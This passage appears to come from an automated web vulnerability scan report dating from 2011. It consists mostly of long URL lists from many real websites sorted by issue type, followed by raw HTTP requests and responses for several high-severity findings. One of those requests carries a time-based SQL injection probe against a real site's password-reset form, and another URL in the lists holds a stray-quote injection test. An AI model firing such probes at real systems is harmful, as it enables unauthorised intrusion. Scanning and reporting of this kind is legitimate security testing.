28.29. http://static.ak.fbcdn.net/rsrc.php/v1/zU/r/bSOHtKbCGYI.png
28.30. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/tgCjNDQG0qU.png
28.31. http://support.expedia.com/app/answers/list/
28.34. http://tours.sapha.com/
28.35. http://www.expedia.com/pub/agent.dll
28.36. http://www.expedia.com/pub/agent.dll
28.37. http://www.expedia.com/pub/agent.dll
28.38. http://www.expedia.com/pub/agent.dll
28.39. http://www.expedia.com/pub/agent.dll
28.40. http://www.expedia.com/pub/agent.dll
28.41. http://www.expedia.com/pub/agent.dll
28.42. http://www.expedia.com/pub/agent.dll
28.43. http://www.expedia.com/pub/agent.dll
28.44. https://www.expedia.com/pub/agent.dll
28.45. https://www.expedia.com/pub/agent.dll
28.46. https://www.expedia.com/pub/agent.dll
28.47. https://www.expedia.com/pub/agent.dll
28.48. https://www.expedia.com/pub/agent.dll
28.49. https://www.expedia.com/pub/agent.dll
28.50. https://www.expedia.com/pub/agent.dll
28.51. http://www.facebook.com/SocialFollow
28.52. http://www.facebook.com/extern/login_status.php
28.53. http://www.facebook.com/extern/login_status.php
28.54. http://www.facebook.com/extern/login_status.php
28.55. http://www.facebook.com/extern/login_status.php
28.56. http://www.facebook.com/extern/login_status.php
28.57. http://www.facebook.com/extern/login_status.php
28.58. http://www.facebook.com/extern/login_status.php
28.59. http://www.facebook.com/extern/login_status.php
28.60. http://www.facebook.com/extern/login_status.php
28.61. http://www.facebook.com/extern/login_status.php
28.62. http://www.facebook.com/extern/login_status.php
28.63. http://www.facebook.com/extern/login_status.php
28.64. http://www.facebook.com/extern/login_status.php
28.65. http://www.facebook.com/extern/login_status.php
28.66. http://www.facebook.com/extern/login_status.php
28.67. http://www.facebook.com/extern/login_status.php
28.68. http://www.facebook.com/extern/login_status.php
28.69. http://www.facebook.com/extern/login_status.php
28.70. http://www.facebook.com/images/loaders/indicator_black.gif
28.71. http://www.facebook.com/plugins/activity.php
28.72. http://www.facebook.com/plugins/activity.php
28.73. http://www.facebook.com/plugins/activity.php
28.74. http://www.facebook.com/plugins/like.php
28.75. http://www.facebook.com/plugins/like.php
28.76. http://www.facebook.com/plugins/like.php
28.77. http://www.facebook.com/plugins/like.php
28.78. http://www.facebook.com/plugins/like.php
28.79. http://www.facebook.com/plugins/like.php
28.80. http://www.facebook.com/plugins/like.php
28.81. http://www.facebook.com/plugins/like.php
28.82. http://www.facebook.com/plugins/like.php
28.83. http://www.facebook.com/plugins/like.php
28.84. http://www.facebook.com/plugins/like.php
28.85. http://www.facebook.com/plugins/like.php
28.86. http://www.facebook.com/plugins/like.php
28.87. http://www.facebook.com/plugins/like.php
28.88. http://www.facebook.com/plugins/like.php
28.89. http://www.facebook.com/plugins/like.php
28.90. http://www.facebook.com/plugins/like.php
28.91. http://www.facebook.com/plugins/like.php
28.92. http://www.facebook.com/plugins/like.php
28.93. http://www.facebook.com/plugins/like.php
28.94. http://www.facebook.com/plugins/like.php
28.95. http://www.facebook.com/plugins/like.php
28.96. http://www.facebook.com/plugins/like.php
28.97. http://www.facebook.com/plugins/like.php
28.98. http://www.facebook.com/plugins/like.php
28.99. http://www.facebook.com/plugins/like.php
28.100. http://www.facebook.com/plugins/like.php
28.101. http://www.facebook.com/plugins/like.php
28.102. http://www.facebook.com/plugins/like.php
28.103. http://www.facebook.com/plugins/like.php
28.104. http://www.facebook.com/plugins/like.php
28.105. http://www.facebook.com/plugins/like.php
28.106. http://www.facebook.com/plugins/like.php
28.107. http://www.facebook.com/plugins/like.php
28.108. http://www.facebook.com/plugins/like.php
28.109. http://www.facebook.com/plugins/like.php
28.110. http://www.facebook.com/plugins/like.php
28.111. http://www.facebook.com/plugins/like.php
28.112. http://www.facebook.com/plugins/like.php
28.113. http://www.facebook.com/plugins/like.php
28.114. http://www.facebook.com/plugins/like.php
28.115. http://www.facebook.com/plugins/like.php
28.116. http://www.facebook.com/plugins/like.php
28.117. http://www.facebook.com/plugins/like.php
28.118. http://www.facebook.com/plugins/like.php
28.119. http://www.facebook.com/plugins/like.php
28.120. http://www.facebook.com/plugins/like.php
28.121. http://www.facebook.com/plugins/like.php
28.122. http://www.facebook.com/plugins/like.php
28.123. http://www.facebook.com/plugins/like.php
28.124. http://www.facebook.com/plugins/like.php
28.125. http://www.facebook.com/plugins/like.php
28.126. http://www.facebook.com/plugins/like.php
28.127. http://www.facebook.com/plugins/like.php
28.128. http://www.facebook.com/plugins/like.php
28.129. http://www.facebook.com/plugins/like.php
28.130. http://www.facebook.com/plugins/like.php
28.131. http://www.facebook.com/plugins/like.php
28.132. http://www.facebook.com/plugins/like.php
28.133. http://www.facebook.com/plugins/like.php
28.134. http://www.facebook.com/plugins/like.php
28.135. http://www.facebook.com/plugins/like.php
28.136. http://www.facebook.com/plugins/like.php
28.137. http://www.facebook.com/plugins/like.php
28.138. http://www.facebook.com/plugins/likebox.php
28.139. http://www.google.com/sdch/vD843DpA.dct
28.140. http://www.millerwelds.com/favicon.ico
28.141. http://www.millerwelds.com/financing/images/darkhead_min.png
28.142. http://www.millerwelds.com/financing/images/lighthead_min.png
28.143. http://www.millerwelds.com/financing/images/plinenavbody_min.png
28.144. http://www.millerwelds.com/financing/images/plinenavfoot_min.png
28.145. http://www.millerwelds.com/financing/images/plinenavhead_min.png
28.146. http://www.millerwelds.com/financing/images/powerline_bg.png
28.147. http://www.millerwelds.com/financing/images/powerline_head.png
28.148. http://www.millerwelds.com/images/footer-social-sprite.jpg
28.149. http://www.millerwelds.com/images/go-search.jpg
28.150. http://www.millerwelds.com/images/logo_printable.gif
28.151. http://www.millerwelds.com/images/nav-new/aboutus.gif
28.152. http://www.millerwelds.com/images/nav-new/blog.gif
28.153. http://www.millerwelds.com/images/nav-new/forums.gif
28.154. http://www.millerwelds.com/images/nav-new/indust_interests.gif
28.155. http://www.millerwelds.com/images/nav-new/powerclick01.gif
28.156. http://www.millerwelds.com/images/nav-new/products.gif
28.157. http://www.millerwelds.com/images/nav-new/resources.gif
28.158. http://www.millerwelds.com/images/nav-new/service.gif
28.159. http://www.millerwelds.com/images/nav-new/wheretobuy.gif
28.160. http://www.millerwelds.com/images/navicons.png
28.162. http://www.scout.com/2/Netsparker14ebae4518d541eba819cda8fa442840.z
28.163. http://www.scout.com/2/a.z
28.164. http://www.scout.com/2/a.z
28.165. http://www.scout.com/2/a.z
28.166. http://www.scout.com/2/a.z
28.167. http://www.scout.com/2/a.z
28.168. http://www.scout.com/2/a.z
28.169. http://www.scout.com/2/a.z
28.170. http://www.scout.com/2/a.z
28.171. http://www.scout.com/2/a.z
28.172. http://www.scout.com/Legacy/a.z
28.173. http://www.scout.com/Netsparker892e409084b746c39d5b25ba070e12d8.z
28.174. http://www.scout.com/a.z
28.175. http://www.scout.com/a.z
28.176. http://www.scout.com/a.z
28.177. http://www.scout.com/a.z
28.178. http://www.scout.com/a.z
28.179. http://www.scout.com/a.z
28.180. http://www.scout.com/a.z
28.181. http://www.scout.com/a.z
28.182. http://www.scout.com/a.z
28.183. http://www.scout.com/a.z
28.184. http://www.scout.com/search.aspx
29.1. http://381-kpd-482.mktoresp.com/webevents/visitWebPage
29.2. http://4qinvite.4q.iperceptions.com/1.aspx
29.3. http://797-pwy-691.mktoresp.com/webevents/visitWebPage
29.4. http://a.rad.msn.com/ADSAdClient31.dll
29.5. http://ad.doubleclick.net/adj/scmag.hmktus/sc
29.6. http://admin.instantservice.com/resources/smartbutton/5371/II_Servers.js
29.7. http://ads.allatsea.net/www/delivery/spcjs.php
29.10. http://altfarm.mediaplex.com/ad/js/16228-124632-16454-0
29.11. http://api.facebook.com/restserver.php
29.12. http://apnxscm.ac3.msn.com:81/CACMSH.ashx
29.13. http://apps.sapha.com/appshandler.php
29.14. http://as.casalemedia.com/j
29.15. http://b.rad.msn.com/ADSAdClient31.dll
29.16. https://broker.gotoassist.com/h/lbmc
29.17. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx
29.18. http://cdn-forums.scout.com/adfeed.ashx
29.19. http://clients1.google.com/webpagethumbnail
29.20. http://clk.atdmt.com/AVE/go/173511812AD54EE6ABF0CBB5D825DA4F/direct/01
29.21. http://d.xp1.ru4.com/activity
29.22. http://dce.sapha.com/engine.php
29.24. http://expedia-www.baynote.net/baynote/tags3/common
29.26. http://fls.doubleclick.net/activityi
29.27. http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
29.28. http://googleads.g.doubleclick.net/pagead/ads
29.30. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js
29.31. http://int.teracent.net/tase/int
29.32. http://jlinks.industrybrains.com/jsct
29.33. http://l.addthiscdn.com/live/t00/250lo.gif
29.34. https://mosaicsecurity.com/products/1919-pci-scan-annual
29.36. http://now.eloqua.com/visitor/v200/svrGP.aspx
29.37. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s91449721802491
29.38. http://p.addthis.com/pixel
29.39. http://poll.websitegear.com/compactpoll.asp
29.40. http://pub.kroogy.com/www/delivery/ajs.php
29.41. http://rad.msn.com/ADSAdClient31.dll
29.42. http://recruiting.scout.com/favicon.ico
29.43. http://s7.addthis.com/js/250/addthis_widget.js
29.45. http://safebrowsing.clients.google.com/safebrowsing/downloads
29.46. http://scouthoops.scout.com/
29.47. https://seals.networksolutions.com/siteseal_seek/siteseal
29.48. http://search.twitter.com/search.json
29.49. http://segment-pixel.invitemedia.com/pixel
29.50. http://spe.atdmt.com/ds/M8MEDPMPRPPR/PP.1001_machupicchu_01_300x250_eng.jpg
29.51. http://static.ak.fbcdn.net/connect/xd_proxy.php
29.52. http://static01.linkedin.com/scds/concat/common/css
29.53. http://static02.linkedin.com/scds/concat/common/js
29.56. http://sync.mathtag.com/sync/img
29.57. http://themes.googleusercontent.com/font
29.58. http://toolbarqueries.clients.google.com/tbproxy/af/query
29.59. http://tours.sapha.com/
29.60. http://track.websiteceo.com/m/
29.61. http://va.px.invitemedia.com/pixel
29.62. http://verify.authorize.net/anetseal/seal.js
29.63. https://verify.authorize.net/anetseal/
29.64. http://widgets.digg.com/buttons/count
29.65. http://www.advancedaccess.com/
29.66. http://www.bizographics.com/collect/
29.67. http://www.clone-systems.com/resell-clone-guard.html
29.68. https://www.clone-systems.com/ecommerce/checkout.php
29.69. http://www.cloneguard.com/pci-scanning.asp
29.70. http://www.dynamicperimeter.com/styles/i/arrows-ffffff.png
29.71. http://www.eneighborhoods.com/
29.72. http://www.expedia.com/daily/styles/3ColFlex1024.css
29.73. https://www.expedia.com/pub/agent.dll
29.74. http://www.facebook.com/plugins/activity.php
29.75. http://www.fiddler2.com/fiddler2/updatecheck.asp
29.76. http://www.google-analytics.com/__utm.gif
29.77. http://www.google.com/uds/
29.78. https://www.google.com/searchdomaincheck
29.79. http://www.googleadservices.com/pagead/conversion/1070200079/
29.80. http://www.gotoassist.com/ph/lbmc
29.81. http://www.harrisconnect.com/plugins/system/yoo_effects/yoo_effects.js.php
29.83. http://www.lbmc.com/landing/pci.htm
29.84. http://www.leadlife.com/analytics/lla.aspx
29.85. http://www.linkedin.com/pub/social-follow/12/7a2/294
29.86. http://www.millersweld.com/error.html
29.87. http://www.millerwelds.com/financing/index.php
29.88. http://www.neospire.net/security-and-compliance/PCI-DSS.php
29.89. http://www.nextadvisor.com/includes/javascript.php
29.90. http://www.resiteonline.com/
29.92. http://www.scmagazineus.com/
29.93. http://www.scout.com/favicon.ico
29.94. http://www.skichalets.co.uk/top/crossfader.js
29.95. http://www.socialfollow.com/button/image/
29.96. http://www.sutherlandglobal.com/
29.97. http://www.trpcweb.com/
30.1. https://broker.gotoassist.com/javaScriptTester.tmpl
30.2. https://events.gsmiweb.com/favicon.ico
30.3. https://mosaicsecurity.com/products/1919-pci-scan-annual
30.4. https://seals.networksolutions.com/siteseal_seek/siteseal
30.5. https://secure.opinionlab.com/ccc01/comment_card.asp
30.6. https://subscribe.haymarketmedia.com/scm/
30.7. https://subscribe.haymarketmedia.com/subscribe/CCI_Custserve.aspx
30.8. https://www.expedia.com/pub/agent.dll
30.9. https://www.expedia.com/pubspec/scripts/isE3OnHtx.asp
30.10. https://www.fiddler2.com/dl/Fiddler2BetaSetup.exe
30.11. https://www.google.com/searchdomaincheck
30.12. https://www.mavitunasecurity.com/support/checkupdate/
30.13. https://www.mavitunasecurity.com/welcome/
30.14. https://www.taxnotebook.com/CopyRightTN.htm
30.15. https://www.trust-guard.com/Templates/New-Green/Images/favicon.ico
31. HTML does not specify charset
31.1. https://events.gsmiweb.com/css/gsmi_events.css
31.2. https://events.gsmiweb.com/events.php
31.3. https://events.gsmiweb.com/images/getconnected_fb.png
31.4. https://events.gsmiweb.com/images/getconnected_linkedin.png
31.5. https://events.gsmiweb.com/images/getconnected_rss.png
31.6. https://events.gsmiweb.com/images/getconnected_twitter.png
31.7. https://events.gsmiweb.com/images/getconnected_youtube.png
31.8. https://events.gsmiweb.com/subscribe.php
31.9. http://fls.doubleclick.net/activityi
31.10. http://freeconferencing.liveoffice.com/conferenceonline/scripts/putclicktocall.js
31.12. http://hmficweb.hinghammutual.com/billing_view/
31.13. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp
31.14. http://hmficweb.hinghammutual.com/billing_view/login.asp
31.15. http://hmficweb.hinghammutual.com/css/
31.16. http://hmficweb.hinghammutual.com/images/
31.17. http://hmficweb.hinghammutual.com/images/content/
31.18. http://hmficweb.hinghammutual.com/images/content/login/
31.19. http://hmficweb.hinghammutual.com/images/home/
31.20. http://hmficweb.hinghammutual.com/includes/
31.21. http://kroogy.com/pub/banner_160_600.php
31.22. http://kroogy.com/pub/banner_728_90_random.php
31.23. http://lbmc.imonitor.net/
31.24. http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp
31.25. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
31.26. http://login.vindicosuite.com/vindico_dynamic.asp
31.27. http://now.eloqua.com/visitor/v200/svrGP.aspx
31.28. http://tags.bluekai.com/site/2576
31.29. http://www.advancedaccess.com/
31.30. http://www.advancedaccess.com/swf/swfobject.js
31.31. http://www.advisorsquare.com/useradmin/Authenticate.asp
31.32. http://www.caribbean-ocean.com/
31.33. http://www.caribbean-ocean.com/accommodation2.php
31.34. http://www.caribbean-ocean.com/index.php
31.35. http://www.caribbean-ocean.com/index.php/1'
31.36. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91
31.37. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
31.38. http://www.caribbean-ocean.com/styles.css
31.39. http://www.caribbean-ocean.com/tabs.js
31.40. http://www.cloneguard.com/favicon.ico
31.41. http://www.compliancepoint.com/sub_serv_isc_pci.asp
31.42. http://www.eneighborhoods.com/favicon.ico
31.43. http://www.eneighborhoods.com/menu/homepage/menu.css
31.44. http://www.eneighborhoods.com/menu/menu.css
31.45. http://www.eneighborhoods.com/menu/mm_css_menu.js
31.46. http://www.expedia.com/pubspec/scripts/isE3OnHtx.asp
31.47. https://www.expedia.com/pubspec/scripts/isE3OnHtx.asp
31.48. http://www.ezflexplan.com/ContentPages/employers.html
31.49. http://www.ezflexplan.com/ContentPages/er_admintls.html
31.50. http://www.ezflexplan.com/ContentPages/er_enrllmnttools.html
31.51. http://www.ezflexplan.com/ContentPages/er_htsuap.html
31.52. http://www.ezflexplan.com/ContentPages/nav_employers.html
31.53. http://www.ezflexplan.com/navigation/frameset.asp
31.54. http://www.ezflexplan.com/navigation/menu.asp
31.55. http://www.firstmateonline.com/businessinfo.php
31.56. http://www.gofileroom.com/SessionRelease.asp
31.57. http://www.gofileroom.com/lbmc/
31.58. https://www.gofileroom.com/lbmc/Default.asp
31.59. http://www.hunton.com/FCWSite/Features/_xpress/
31.60. http://www.millersweld.com/error.html
31.61. http://www.networksolutions.com/jsonBrowserInfo.do
31.62. http://www.nextadvisor.com/includes/javascript.php
31.63. http://www.nutter.com/attorneys.php
31.64. http://www.nutter.com/careers.php
31.65. http://www.nutter.com/home.php
31.66. http://www.skichalets.co.uk/top/Crossfader.js
31.67. http://www.socialfollow.com/button/image/
31.68. http://www.socialfollow.com/js/flash-detect.js
31.69. http://www.socialfollow.com/js/jquery.js
31.70. http://www.socialfollow.com/js/thickbox.js
31.71. http://www.socialfollow.com/js/validator.js
31.72. https://www.taxnotebook.com/CopyRightTN.htm
32. HTML uses unrecognised charset
32.1. https://secure.opinionlab.com/ccc01/comment_card.asp
32.2. http://www.advisorsquare.com/new/asle05/content.asp
33. Content type incorrectly stated
33.1. http://a.rad.msn.com/ADSAdClient31.dll
33.2. http://a1.twimg.com/profile_images/258292367/av-2_normal.gif
33.3. http://a2.twimg.com/profile_images/58727890/PIA08370_normal.png
33.5. http://allatsea.net/assets/social/find_us_on_facebook.png
33.6. http://b.rad.msn.com/ADSAdClient31.dll
33.7. https://broker.gotoassist.com/javaScriptTester.tmpl
33.8. http://dce.sapha.com/engine.php
33.9. https://events.gsmiweb.com/favicon.ico
33.10. http://expedia-www.baynote.net/baynote/tags3/common
33.11. http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
33.12. http://hmficweb.hinghammutual.com/images/leftcolumn/photo-agents.jpg
33.13. http://learn.bridgefront.com/favicon.ico
33.14. http://media.expedia.com/media/content/expus/graphics/home/wiz/wizard_booking_image.gif
33.15. http://now.eloqua.com/visitor/v200/svrGP.aspx
33.16. http://poll.websitegear.com/compactpoll.asp
33.17. http://rad.msn.com/ADSAdClient31.dll
33.18. http://sales.liveperson.net/hcp/html/mTag.js
33.19. http://seal.globalsign.com/SiteSeal/gs_image_130-65_en.js
33.20. http://st.madisonlogic.com/images/userlogo/2/2437_Viewfinity_Logo-150x50.jpg
33.21. http://st.madisonlogic.com/images/userlogo/2/2931_Arbor_Logo.jpg
33.22. http://st.madisonlogic.com/images/userlogo/3/3189_HP_S64_Logo.jpg
33.23. http://support.expedia.com/ci/ajaxRequest/getReportData
33.24. http://verify.authorize.net/anetseal/images/secure90x72.gif
33.25. https://verify.authorize.net/anetseal/images/secure90x72.gif
33.26. http://www.advisorsquare.com/design_gallery/welcome/HP_pict1.jpg
33.27. http://www.advisorsquare.com/design_gallery/welcome/HP_pict2.jpg
33.28. http://www.advisorsquare.com/design_gallery/welcome/HP_pict3.jpg
33.29. http://www.advisorsquare.com/design_gallery/welcome/HP_pict4.jpg
33.30. http://www.advisorsquare.com/new/AccountantSquareDemo/tax_calendar.jpg
33.31. http://www.advisorsquare.com/new/BrochureLevel/GA15_banner.jpg
33.32. http://www.advisorsquare.com/new/BrochureLevel/HP_pict2.jpg
33.33. http://www.advisorsquare.com/new/BrochureLevel/HP_pict3.jpg
33.34. http://www.advisorsquare.com/new/BrochureLevel/HP_welcomePhoto.jpg
33.35. http://www.advisorsquare.com/new/BusinessLevel/FA09Banner.jpg
33.36. http://www.advisorsquare.com/new/BusinessLevel/HP_pict1.jpg
33.37. http://www.advisorsquare.com/new/BusinessLevel/HP_pict2.jpg
33.38. http://www.advisorsquare.com/new/BusinessLevel/HP_pict3.jpg
33.39. http://www.advisorsquare.com/new/BusinessLevel/HP_pict4.jpg
33.40. http://www.advisorsquare.com/new/PremiumLevel/FA03Banner.jpg
33.41. http://www.advisorsquare.com/new/PremiumLevel/HP_pict3.jpg
33.42. http://www.advisorsquare.com/new/PremiumLevel/HP_pict4.jpg
33.43. http://www.advisorsquare.com/new/PremiumLevel/leftframe.jpg
33.44. http://www.advisorsquare.com/new/asframeless02/Business02_asBanner.jpg
33.45. http://www.advisorsquare.com/new/asframeless02/banner_bus02.jpg
33.46. http://www.advisorsquare.com/new/asle04/L3company_pict1.jpg
33.47. http://www.advisorsquare.com/new/asle04/L3company_pict2.jpg
33.48. http://www.advisorsquare.com/new/asle04/L3links_pict1.jpg
33.49. http://www.advisorsquare.com/new/asle04/L3links_pict2.jpg
33.50. http://www.advisorsquare.com/new/asle04/L3products_pict1.jpg
33.51. http://www.advisorsquare.com/new/asle04/home_01.jpg
33.52. http://www.advisorsquare.com/new/asle04/home_02.jpg
33.53. http://www.advisorsquare.com/new/asle04/home_03.jpg
33.54. http://www.advisorsquare.com/new/asle04/place_banner.jpg
33.55. http://www.advisorsquare.com/new/asle05/HP_pict2.jpg
33.56. http://www.advisorsquare.com/new/asle05/asle05_banner.jpg
33.57. http://www.advisorsquare.com/new/asle05/menubg.jpg
33.58. http://www.agentadvantage.com/favicon.ico
33.59. http://www.angege.com/links.php
33.60. http://www.btamericascareers.com/furniture/IT_WhatsInItForYou.gif
33.61. http://www.caribbean-ocean.com/styles.css
33.62. http://www.caribbean-ocean.com/tabs.js
33.63. http://www.dhmiservices.com/ClickContact/js.ashx
33.64. http://www.dominionenterprises.com/site/scripts/qm_slide_effect.js
33.65. http://www.dynamicperimeter.com/styles/favicon.ico
33.66. http://www.expedia.com/daily/js/flash.vbs
33.67. http://www.expedia.com/pubspec/scripts/isE3OnHtx.asp
33.68. https://www.expedia.com/pubspec/scripts/isE3OnHtx.asp
33.69. http://www.facebook.com/extern/login_status.php
33.70. http://www.firstmateonline.com/businessinfo.php
33.71. http://www.google.com/mbd
33.72. http://www.google.com/search
33.73. http://www.lbmc.com/favicon.ico
33.74. http://www.lbmc.com/misc/favicon.ico
33.75. http://www.lbmc.com/sites/default/files/imagecache/profile-150x200/gherman.jpg
33.76. https://www.mavitunasecurity.com/support/checkupdate/
33.77. http://www.millerwelds.com/favicon.ico
33.78. http://www.networksolutions.com/jsonBrowserInfo.do
33.79. http://www.nextadvisor.com/includes/javascript.php
33.80. http://www.scout.com/2/a.z
33.81. http://www.scout.com/webproxy.ashx
33.82. http://www.secureworks.com/images/rssfeed.gif
33.83. http://www.skichalets.co.uk/top/Crossfader.js
33.84. http://www.socialfollow.com/button/image/
33.85. http://www.socialfollow.com/js/flash-detect.js
33.86. http://www.socialfollow.com/js/jquery.js
33.87. http://www.socialfollow.com/js/thickbox.js
33.88. http://www.socialfollow.com/js/validator.js
33.89. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_01.jpg
33.90. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_05.jpg
33.91. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_07.jpg
33.92. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-white_05.jpg
33.93. https://www.trust-guard.com/Templates/New-Green/Images/favicon.ico
33.94. http://www2.sesamestats.com/paneltracking.aspx
34. Content type is not specified
34.1. http://www.expedia.com/static/default/default/images/close.gif
34.2. http://www.expedia.com/static/frog/v0.1a/images/iconSpritesT.png
34.3. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png
34.4. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png
34.5. http://www.expedia.com/static/fusion/v2.3/images/customersupport/flyout_arrow.png
34.6. http://www.expedia.com/static/fusion/v2.3/images/customersupport/lady78x78.gif
34.7. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png
34.8. http://www.expedia.com/static/fusion/v2.3/images/wizard/promo_bg.png
34.9. http://www.expedia.com/static/fusion/v2.3/images/wizard/wizard_out_bg.gif
34.10. http://www.socialfollow.com/button/image/
Severity: | High |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | / |
GET / HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:03:29 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | / |
GET / HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:56:06 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
POST /ResetPassword.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 Origin: https://secure.trust User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 Content-Length: 66 txtEmail=-111%27+OR+SLEEP |
HTTP/1.1 302 Found Date: Sat, 07 May 2011 01:20:55 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 200 Location: index.php P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |
Severity: | High |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:30:13 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:12:23 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.hunton.com |
Path: | /aboutus/uniGC.aspx |
GET /aboutus/uniGC.aspx?xpST Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
